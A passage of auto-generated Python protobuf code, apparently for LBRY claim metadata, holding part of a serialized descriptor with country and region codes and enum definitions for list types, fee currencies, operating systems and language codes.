\x06\n\x02GN\x10]\x12\x06\n\x02GW\x10^\x12\x06\n\x02GY\x10_\x12\x06\n\x02HT\x10`\x12\x06\n\x02HM\x10\x61\x12\x06\n\x02VA\x10\x62\x12\x06\n\x02HN\x10\x63\x12\x06\n\x02HK\x10\x64\x12\x06\n\x02HU\x10\x65\x12\x06\n\x02IS\x10\x66\x12\x06\n\x02IN\x10g\x12\x06\n\x02ID\x10h\x12\x06\n\x02IR\x10i\x12\x06\n\x02IQ\x10j\x12\x06\n\x02IE\x10k\x12\x06\n\x02IM\x10l\x12\x06\n\x02IL\x10m\x12\x06\n\x02IT\x10n\x12\x06\n\x02JM\x10o\x12\x06\n\x02JP\x10p\x12\x06\n\x02JE\x10q\x12\x06\n\x02JO\x10r\x12\x06\n\x02KZ\x10s\x12\x06\n\x02KE\x10t\x12\x06\n\x02KI\x10u\x12\x06\n\
x02KP\x10v\x12\x06\n\x02KR\x10w\x12\x06\n\x02KW\x10x\x12\x06\n\x02KG\x10y\x12\x06\n\x02LA\x10z\x12\x06\n\x02LV\x10{\x12\x06\n\x02LB\x10|\x12\x06\n\x02LS\x10}\x12\x06\n\x02LR\x10~\x12\x06\n\x02LY\x10\x7f\x12\x07\n\x02LI\x10\x80\x01\x12\x07\n\x02LT\x10\x81\x01\x12\x07\n\x02LU\x10\x82\x01\x12\x07\n\x02MO\x10\x83\x01\x12\x07\n\x02MK\x10\x84\x01\x12\x07\n\x02MG\x10\x85\x01\x12\x07\n\x02MW\x10\x86\x01\x12\x07\n\x02MY\x10\x87\x01\x12\x07\n\x02MV\x10\x88\x01\x12\x07\n\x02ML\x10\x89\x01\x12\x07\n\x02MT\x10\x8a\x01\x12\x07\n\x02MH\x10\x8b\x01\x12\x07\n\x02MQ\x10\x8c\x01\x12\x07\n\x02MR\x10\x8d\x01\x12\x07\n\x02MU\x10\x8e\x01\x12\x07\n\x02YT\x10\x8f\x01\x12\x07\n\x02MX\x10\x90\x01\x12\x07\n\x02\x46M\x10\x91\x01\x12\x07\n\x02MD\x10\x92\x01\x12\x07\n\x02MC\x10\x93\x01\x12\x07\n\x02MN\x10\x94\x01\x12\x07\n\x02ME\x10\x95\x01\x12\x07\n\x02MS\x10\x96\x01\x12\x07\n\x02MA\x10\x97\x01\x12\x07\n\x02MZ\x10\x98\x01\x12\x07\n\x02MM\x10\x99\x01\x12\x07\n\x02NA\x10\x9a\x01\x12\x07\n\x02NR\x10\x9b\x01\x12\x07\n\x02NP\x10\x9c\x01\x12\x07\n\x02NL\x10\x9d\x01\x12\x07\n\x02NC\x10\x9e\x01\x12\x07\n\x02NZ\x10\x9f\x01\x12\x07\n\x02NI\x10\xa0\x01\x12\x07\n\x02NE\x10\xa1\x01\x12\x07\n\x02NG\x10\xa2\x01\x12\x07\n\x02NU\x10\xa3\x01\x12\x07\n\x02NF\x10\xa4\x01\x12\x07\n\x02MP\x10\xa5\x01\x12\x07\n\x02NO\x10\xa6\x01\x12\x07\n\x02OM\x10\xa7\x01\x12\x07\n\x02PK\x10\xa8\x01\x12\x07\n\x02PW\x10\xa9\x01\x12\x07\n\x02PS\x10\xaa\x01\x12\x07\n\x02PA\x10\xab\x01\x12\x07\n\x02PG\x10\xac\x01\x12\x07\n\x02PY\x10\xad\x01\x12\x07\n\x02PE\x10\xae\x01\x12\x07\n\x02PH\x10\xaf\x01\x12\x07\n\x02PN\x10\xb0\x01\x12\x07\n\x02PL\x10\xb1\x01\x12\x07\n\x02PT\x10\xb2\x01\x12\x07\n\x02PR\x10\xb3\x01\x12\x07\n\x02QA\x10\xb4\x01\x12\x07\n\x02RE\x10\xb5\x01\x12\x07\n\x02RO\x10\xb6\x01\x12\x07\n\x02RU\x10\xb7\x01\x12\x07\n\x02RW\x10\xb8\x01\x12\x07\n\x02\x42L\x10\xb9\x01\x12\x07\n\x02SH\x10\xba\x01\x12\x07\n\x02KN\x10\xbb\x01\x12\x07\n\x02LC\x10\xbc\x01\x12\x07\n\x02MF\x10\xbd\x01\x12\x07\n\x02PM\x10\xbe\x01\x12\x07\n\x02VC\x10\xbf\x01
\x12\x07\n\x02WS\x10\xc0\x01\x12\x07\n\x02SM\x10\xc1\x01\x12\x07\n\x02ST\x10\xc2\x01\x12\x07\n\x02SA\x10\xc3\x01\x12\x07\n\x02SN\x10\xc4\x01\x12\x07\n\x02RS\x10\xc5\x01\x12\x07\n\x02SC\x10\xc6\x01\x12\x07\n\x02SL\x10\xc7\x01\x12\x07\n\x02SG\x10\xc8\x01\x12\x07\n\x02SX\x10\xc9\x01\x12\x07\n\x02SK\x10\xca\x01\x12\x07\n\x02SI\x10\xcb\x01\x12\x07\n\x02SB\x10\xcc\x01\x12\x07\n\x02SO\x10\xcd\x01\x12\x07\n\x02ZA\x10\xce\x01\x12\x07\n\x02GS\x10\xcf\x01\x12\x07\n\x02SS\x10\xd0\x01\x12\x07\n\x02\x45S\x10\xd1\x01\x12\x07\n\x02LK\x10\xd2\x01\x12\x07\n\x02SD\x10\xd3\x01\x12\x07\n\x02SR\x10\xd4\x01\x12\x07\n\x02SJ\x10\xd5\x01\x12\x07\n\x02SZ\x10\xd6\x01\x12\x07\n\x02SE\x10\xd7\x01\x12\x07\n\x02\x43H\x10\xd8\x01\x12\x07\n\x02SY\x10\xd9\x01\x12\x07\n\x02TW\x10\xda\x01\x12\x07\n\x02TJ\x10\xdb\x01\x12\x07\n\x02TZ\x10\xdc\x01\x12\x07\n\x02TH\x10\xdd\x01\x12\x07\n\x02TL\x10\xde\x01\x12\x07\n\x02TG\x10\xdf\x01\x12\x07\n\x02TK\x10\xe0\x01\x12\x07\n\x02TO\x10\xe1\x01\x12\x07\n\x02TT\x10\xe2\x01\x12\x07\n\x02TN\x10\xe3\x01\x12\x07\n\x02TR\x10\xe4\x01\x12\x07\n\x02TM\x10\xe5\x01\x12\x07\n\x02TC\x10\xe6\x01\x12\x07\n\x02TV\x10\xe7\x01\x12\x07\n\x02UG\x10\xe8\x01\x12\x07\n\x02UA\x10\xe9\x01\x12\x07\n\x02\x41\x45\x10\xea\x01\x12\x07\n\x02GB\x10\xeb\x01\x12\x07\n\x02US\x10\xec\x01\x12\x07\n\x02UM\x10\xed\x01\x12\x07\n\x02UY\x10\xee\x01\x12\x07\n\x02UZ\x10\xef\x01\x12\x07\n\x02VU\x10\xf0\x01\x12\x07\n\x02VE\x10\xf1\x01\x12\x07\n\x02VN\x10\xf2\x01\x12\x07\n\x02VG\x10\xf3\x01\x12\x07\n\x02VI\x10\xf4\x01\x12\x07\n\x02WF\x10\xf5\x01\x12\x07\n\x02\x45H\x10\xf6\x01\x12\x07\n\x02YE\x10\xf7\x01\x12\x07\n\x02ZM\x10\xf8\x01\x12\x07\n\x02ZW\x10\xf9\x01\x12\t\n\x04R001\x10\xfa\x01\x12\t\n\x04R002\x10\xfb\x01\x12\t\n\x04R015\x10\xfc\x01\x12\t\n\x04R012\x10\xfd\x01\x12\t\n\x04R818\x10\xfe\x01\x12\t\n\x04R434\x10\xff\x01\x12\t\n\x04R504\x10\x80\x02\x12\t\n\x04R729\x10\x81\x02\x12\t\n\x04R788\x10\x82\x02\x12\t\n\x04R732\x10\x83\x02\x12\t\n\x04R202\x10\x84\x02\x12\t\n\x04R014\x10\x85\x02\x12\t\n\x04R086\x10\x86\
x02\x12\t\n\x04R108\x10\x87\x02\x12\t\n\x04R174\x10\x88\x02\x12\t\n\x04R262\x10\x89\x02\x12\t\n\x04R232\x10\x8a\x02\x12\t\n\x04R231\x10\x8b\x02\x12\t\n\x04R260\x10\x8c\x02\x12\t\n\x04R404\x10\x8d\x02\x12\t\n\x04R450\x10\x8e\x02\x12\t\n\x04R454\x10\x8f\x02\x12\t\n\x04R480\x10\x90\x02\x12\t\n\x04R175\x10\x91\x02\x12\t\n\x04R508\x10\x92\x02\x12\t\n\x04R638\x10\x93\x02\x12\t\n\x04R646\x10\x94\x02\x12\t\n\x04R690\x10\x95\x02\x12\t\n\x04R706\x10\x96\x02\x12\t\n\x04R728\x10\x97\x02\x12\t\n\x04R800\x10\x98\x02\x12\t\n\x04R834\x10\x99\x02\x12\t\n\x04R894\x10\x9a\x02\x12\t\n\x04R716\x10\x9b\x02\x12\t\n\x04R017\x10\x9c\x02\x12\t\n\x04R024\x10\x9d\x02\x12\t\n\x04R120\x10\x9e\x02\x12\t\n\x04R140\x10\x9f\x02\x12\t\n\x04R148\x10\xa0\x02\x12\t\n\x04R178\x10\xa1\x02\x12\t\n\x04R180\x10\xa2\x02\x12\t\n\x04R226\x10\xa3\x02\x12\t\n\x04R266\x10\xa4\x02\x12\t\n\x04R678\x10\xa5\x02\x12\t\n\x04R018\x10\xa6\x02\x12\t\n\x04R072\x10\xa7\x02\x12\t\n\x04R748\x10\xa8\x02\x12\t\n\x04R426\x10\xa9\x02\x12\t\n\x04R516\x10\xaa\x02\x12\t\n\x04R710\x10\xab\x02\x12\t\n\x04R011\x10\xac\x02\x12\t\n\x04R204\x10\xad\x02\x12\t\n\x04R854\x10\xae\x02\x12\t\n\x04R132\x10\xaf\x02\x12\t\n\x04R384\x10\xb0\x02\x12\t\n\x04R270\x10\xb1\x02\x12\t\n\x04R288\x10\xb2\x02\x12\t\n\x04R324\x10\xb3\x02\x12\t\n\x04R624\x10\xb4\x02\x12\t\n\x04R430\x10\xb5\x02\x12\t\n\x04R466\x10\xb6\x02\x12\t\n\x04R478\x10\xb7\x02\x12\t\n\x04R562\x10\xb8\x02\x12\t\n\x04R566\x10\xb9\x02\x12\t\n\x04R654\x10\xba\x02\x12\t\n\x04R686\x10\xbb\x02\x12\t\n\x04R694\x10\xbc\x02\x12\t\n\x04R768\x10\xbd\x02\x12\t\n\x04R019\x10\xbe\x02\x12\t\n\x04R419\x10\xbf\x02\x12\t\n\x04R029\x10\xc0\x02\x12\t\n\x04R660\x10\xc1\x02\x12\t\n\x04R028\x10\xc2\x02\x12\t\n\x04R533\x10\xc3\x02\x12\t\n\x04R044\x10\xc4\x02\x12\t\n\x04R052\x10\xc5\x02\x12\t\n\x04R535\x10\xc6\x02\x12\t\n\x04R092\x10\xc7\x02\x12\t\n\x04R136\x10\xc8\x02\x12\t\n\x04R192\x10\xc9\x02\x12\t\n\x04R531\x10\xca\x02\x12\t\n\x04R212\x10\xcb\x02\x12\t\n\x04R214\x10\xcc\x02\x12\t\n\x04R308\x10\xcd\x02\x12\t\n\
x04R312\x10\xce\x02\x12\t\n\x04R332\x10\xcf\x02\x12\t\n\x04R388\x10\xd0\x02\x12\t\n\x04R474\x10\xd1\x02\x12\t\n\x04R500\x10\xd2\x02\x12\t\n\x04R630\x10\xd3\x02\x12\t\n\x04R652\x10\xd4\x02\x12\t\n\x04R659\x10\xd5\x02\x12\t\n\x04R662\x10\xd6\x02\x12\t\n\x04R663\x10\xd7\x02\x12\t\n\x04R670\x10\xd8\x02\x12\t\n\x04R534\x10\xd9\x02\x12\t\n\x04R780\x10\xda\x02\x12\t\n\x04R796\x10\xdb\x02\x12\t\n\x04R850\x10\xdc\x02\x12\t\n\x04R013\x10\xdd\x02\x12\t\n\x04R084\x10\xde\x02\x12\t\n\x04R188\x10\xdf\x02\x12\t\n\x04R222\x10\xe0\x02\x12\t\n\x04R320\x10\xe1\x02\x12\t\n\x04R340\x10\xe2\x02\x12\t\n\x04R484\x10\xe3\x02\x12\t\n\x04R558\x10\xe4\x02\x12\t\n\x04R591\x10\xe5\x02\x12\t\n\x04R005\x10\xe6\x02\x12\t\n\x04R032\x10\xe7\x02\x12\t\n\x04R068\x10\xe8\x02\x12\t\n\x04R074\x10\xe9\x02\x12\t\n\x04R076\x10\xea\x02\x12\t\n\x04R152\x10\xeb\x02\x12\t\n\x04R170\x10\xec\x02\x12\t\n\x04R218\x10\xed\x02\x12\t\n\x04R238\x10\xee\x02\x12\t\n\x04R254\x10\xef\x02\x12\t\n\x04R328\x10\xf0\x02\x12\t\n\x04R600\x10\xf1\x02\x12\t\n\x04R604\x10\xf2\x02\x12\t\n\x04R239\x10\xf3\x02\x12\t\n\x04R740\x10\xf4\x02\x12\t\n\x04R858\x10\xf5\x02\x12\t\n\x04R862\x10\xf6\x02\x12\t\n\x04R021\x10\xf7\x02\x12\t\n\x04R060\x10\xf8\x02\x12\t\n\x04R124\x10\xf9\x02\x12\t\n\x04R304\x10\xfa\x02\x12\t\n\x04R666\x10\xfb\x02\x12\t\n\x04R840\x10\xfc\x02\x12\t\n\x04R010\x10\xfd\x02\x12\t\n\x04R142\x10\xfe\x02\x12\t\n\x04R143\x10\xff\x02\x12\t\n\x04R398\x10\x80\x03\x12\t\n\x04R417\x10\x81\x03\x12\t\n\x04R762\x10\x82\x03\x12\t\n\x04R795\x10\x83\x03\x12\t\n\x04R860\x10\x84\x03\x12\t\n\x04R030\x10\x85\x03\x12\t\n\x04R156\x10\x86\x03\x12\t\n\x04R344\x10\x87\x03\x12\t\n\x04R446\x10\x88\x03\x12\t\n\x04R408\x10\x89\x03\x12\t\n\x04R392\x10\x8a\x03\x12\t\n\x04R496\x10\x8b\x03\x12\t\n\x04R410\x10\x8c\x03\x12\t\n\x04R035\x10\x8d\x03\x12\t\n\x04R096\x10\x8e\x03\x12\t\n\x04R116\x10\x8f\x03\x12\t\n\x04R360\x10\x90\x03\x12\t\n\x04R418\x10\x91\x03\x12\t\n\x04R458\x10\x92\x03\x12\t\n\x04R104\x10\x93\x03\x12\t\n\x04R608\x10\x94\x03\x12\t\n\x04R702\x10\
x95\x03\x12\t\n\x04R764\x10\x96\x03\x12\t\n\x04R626\x10\x97\x03\x12\t\n\x04R704\x10\x98\x03\x12\t\n\x04R034\x10\x99\x03\x12\t\n\x04R004\x10\x9a\x03\x12\t\n\x04R050\x10\x9b\x03\x12\t\n\x04R064\x10\x9c\x03\x12\t\n\x04R356\x10\x9d\x03\x12\t\n\x04R364\x10\x9e\x03\x12\t\n\x04R462\x10\x9f\x03\x12\t\n\x04R524\x10\xa0\x03\x12\t\n\x04R586\x10\xa1\x03\x12\t\n\x04R144\x10\xa2\x03\x12\t\n\x04R145\x10\xa3\x03\x12\t\n\x04R051\x10\xa4\x03\x12\t\n\x04R031\x10\xa5\x03\x12\t\n\x04R048\x10\xa6\x03\x12\t\n\x04R196\x10\xa7\x03\x12\t\n\x04R268\x10\xa8\x03\x12\t\n\x04R368\x10\xa9\x03\x12\t\n\x04R376\x10\xaa\x03\x12\t\n\x04R400\x10\xab\x03\x12\t\n\x04R414\x10\xac\x03\x12\t\n\x04R422\x10\xad\x03\x12\t\n\x04R512\x10\xae\x03\x12\t\n\x04R634\x10\xaf\x03\x12\t\n\x04R682\x10\xb0\x03\x12\t\n\x04R275\x10\xb1\x03\x12\t\n\x04R760\x10\xb2\x03\x12\t\n\x04R792\x10\xb3\x03\x12\t\n\x04R784\x10\xb4\x03\x12\t\n\x04R887\x10\xb5\x03\x12\t\n\x04R150\x10\xb6\x03\x12\t\n\x04R151\x10\xb7\x03\x12\t\n\x04R112\x10\xb8\x03\x12\t\n\x04R100\x10\xb9\x03\x12\t\n\x04R203\x10\xba\x03\x12\t\n\x04R348\x10\xbb\x03\x12\t\n\x04R616\x10\xbc\x03\x12\t\n\x04R498\x10\xbd\x03\x12\t\n\x04R642\x10\xbe\x03\x12\t\n\x04R643\x10\xbf\x03\x12\t\n\x04R703\x10\xc0\x03\x12\t\n\x04R804\x10\xc1\x03\x12\t\n\x04R154\x10\xc2\x03\x12\t\n\x04R248\x10\xc3\x03\x12\t\n\x04R830\x10\xc4\x03\x12\t\n\x04R831\x10\xc5\x03\x12\t\n\x04R832\x10\xc6\x03\x12\t\n\x04R680\x10\xc7\x03\x12\t\n\x04R208\x10\xc8\x03\x12\t\n\x04R233\x10\xc9\x03\x12\t\n\x04R234\x10\xca\x03\x12\t\n\x04R246\x10\xcb\x03\x12\t\n\x04R352\x10\xcc\x03\x12\t\n\x04R372\x10\xcd\x03\x12\t\n\x04R833\x10\xce\x03\x12\t\n\x04R428\x10\xcf\x03\x12\t\n\x04R440\x10\xd0\x03\x12\t\n\x04R578\x10\xd1\x03\x12\t\n\x04R744\x10\xd2\x03\x12\t\n\x04R752\x10\xd3\x03\x12\t\n\x04R826\x10\xd4\x03\x12\t\n\x04R039\x10\xd5\x03\x12\t\n\x04R008\x10\xd6\x03\x12\t\n\x04R020\x10\xd7\x03\x12\t\n\x04R070\x10\xd8\x03\x12\t\n\x04R191\x10\xd9\x03\x12\t\n\x04R292\x10\xda\x03\x12\t\n\x04R300\x10\xdb\x03\x12\t\n\x04R336\x10\xdc\x03\x12\
t\n\x04R380\x10\xdd\x03\x12\t\n\x04R470\x10\xde\x03\x12\t\n\x04R499\x10\xdf\x03\x12\t\n\x04R807\x10\xe0\x03\x12\t\n\x04R620\x10\xe1\x03\x12\t\n\x04R674\x10\xe2\x03\x12\t\n\x04R688\x10\xe3\x03\x12\t\n\x04R705\x10\xe4\x03\x12\t\n\x04R724\x10\xe5\x03\x12\t\n\x04R155\x10\xe6\x03\x12\t\n\x04R040\x10\xe7\x03\x12\t\n\x04R056\x10\xe8\x03\x12\t\n\x04R250\x10\xe9\x03\x12\t\n\x04R276\x10\xea\x03\x12\t\n\x04R438\x10\xeb\x03\x12\t\n\x04R442\x10\xec\x03\x12\t\n\x04R492\x10\xed\x03\x12\t\n\x04R528\x10\xee\x03\x12\t\n\x04R756\x10\xef\x03\x12\t\n\x04R009\x10\xf0\x03\x12\t\n\x04R053\x10\xf1\x03\x12\t\n\x04R036\x10\xf2\x03\x12\t\n\x04R162\x10\xf3\x03\x12\t\n\x04R166\x10\xf4\x03\x12\t\n\x04R334\x10\xf5\x03\x12\t\n\x04R554\x10\xf6\x03\x12\t\n\x04R574\x10\xf7\x03\x12\t\n\x04R054\x10\xf8\x03\x12\t\n\x04R242\x10\xf9\x03\x12\t\n\x04R540\x10\xfa\x03\x12\t\n\x04R598\x10\xfb\x03\x12\t\n\x04R090\x10\xfc\x03\x12\t\n\x04R548\x10\xfd\x03\x12\t\n\x04R057\x10\xfe\x03\x12\t\n\x04R316\x10\xff\x03\x12\t\n\x04R296\x10\x80\x04\x12\t\n\x04R584\x10\x81\x04\x12\t\n\x04R583\x10\x82\x04\x12\t\n\x04R520\x10\x83\x04\x12\t\n\x04R580\x10\x84\x04\x12\t\n\x04R585\x10\x85\x04\x12\t\n\x04R581\x10\x86\x04\x12\t\n\x04R061\x10\x87\x04\x12\t\n\x04R016\x10\x88\x04\x12\t\n\x04R184\x10\x89\x04\x12\t\n\x04R258\x10\x8a\x04\x12\t\n\x04R570\x10\x8b\x04\x12\t\n\x04R612\x10\x8c\x04\x12\t\n\x04R882\x10\x8d\x04\x12\t\n\x04R772\x10\x8e\x04\x12\t\n\x04R776\x10\x8f\x04\x12\t\n\x04R798\x10\x90\x04\x12\t\n\x04R876\x10\x91\x04\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_CLAIMLIST_LISTTYPE = _descriptor.EnumDescriptor(
name='ListType',
full_name='pb.ClaimList.ListType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='COLLECTION', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DERIVATION', index=1, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=852,
serialized_end=894,
)
_sym_db.RegisterEnumDescriptor(_CLAIMLIST_LISTTYPE)
_FEE_CURRENCY = _descriptor.EnumDescriptor(
name='Currency',
full_name='pb.Fee.Currency',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_CURRENCY', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LBC', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BTC', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USD', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=1096,
serialized_end=1155,
)
_sym_db.RegisterEnumDescriptor(_FEE_CURRENCY)
_SOFTWARE_OS = _descriptor.EnumDescriptor(
name='OS',
full_name='pb.Software.OS',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_OS', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ANY', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LINUX', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WINDOWS', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MAC', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ANDROID', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IOS', index=6, number=6,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=1332,
serialized_end=1416,
)
_sym_db.RegisterEnumDescriptor(_SOFTWARE_OS)
_LANGUAGE_LANGUAGE = _descriptor.EnumDescriptor(
name='Language',
full_name='pb.Language.Language',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_LANGUAGE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='en', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='aa', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ab', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ae', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='af', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ak', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='am', index=7, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='an', index=8, number=8,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ar', index=9, number=9,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='as', index=10, number=10,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='av', index=11, number=11,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ay', index=12, number=12,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='az', index=13, number=13,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ba', index=14, number=14,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='be', index=15, number=15,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bg', index=16, number=16,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bh', index=17, number=17,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bi', index=18, number=18,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bm', index=19, number=19,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bn', index=20, number=20,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bo', index=21, number=21,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='br', index=22, number=22,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='bs', index=23, number=23,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ca', index=24, number=24,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ce', index=25, number=25,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ch', index=26, number=26,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='co', index=27, number=27,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='cr', index=28, number=28,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='cs', index=29, number=29,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='cu', index=30, number=30,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='cv', index=31, number=31,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='cy', index=32, number=32,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='da', index=33, number=33,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='de', index=34, number=34,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='dv', index=35, number=35,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='dz', index=36, number=36,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ee', index=37, number=37,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='el', index=38, number=38,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='eo', index=39, number=39,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='es', index=40, number=40,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='et', index=41, number=41,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='eu', index=42, number=42,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fa', index=43, number=43,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ff', index=44, number=44,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fi', index=45, number=45,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fj', index=46, number=46,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fo', index=47, number=47,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fr', index=48, number=48,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='fy', index=49, number=49,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ga', index=50, number=50,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='gd', index=51, number=51,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='gl', index=52, number=52,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='gn', index=53, number=53,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='gu', index=54, number=54,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='gv', index=55, number=55,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ha', index=56, number=56,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='he', index=57, number=57,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='hi', index=58, number=58,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ho', index=59, number=59,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='hr', index=60, number=60,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ht', index=61, number=61,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='hu', index=62, number=62,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='hy', index=63, number=63,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='hz', index=64, number=64,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ia', index=65, number=65,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='id', index=66, number=66,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ie', index=67, number=67,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ig', index=68, number=68,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ii', index=69, number=69,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ik', index=70, number=70,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='io', index=71, number=71,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='is', index=72, number=72,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='it', index=73, number=73,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='iu', index=74, number=74,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ja', index=75, number=75,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='jv', index=76, number=76,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ka', index=77, number=77,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kg', index=78, number=78,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ki', index=79, number=79,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kj', index=80, number=80,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kk', index=81, number=81,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kl', index=82, number=82,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='km', index=83, number=83,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kn', index=84, number=84,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ko', index=85, number=85,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kr', index=86, number=86,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ks', index=87, number=87,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ku', index=88, number=88,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kv', index=89, number=89,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='kw', index=90, number=90,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ky', index=91, number=91,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='la', index=92, number=92,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lb', index=93, number=93,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lg', index=94, number=94,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='li', index=95, number=95,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ln', index=96, number=96,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lo', index=97, number=97,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lt', index=98, number=98,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lu', index=99, number=99,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='lv', index=100, number=100,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mg', index=101, number=101,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mh', index=102, number=102,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mi', index=103, number=103,
options=None,
type=None),
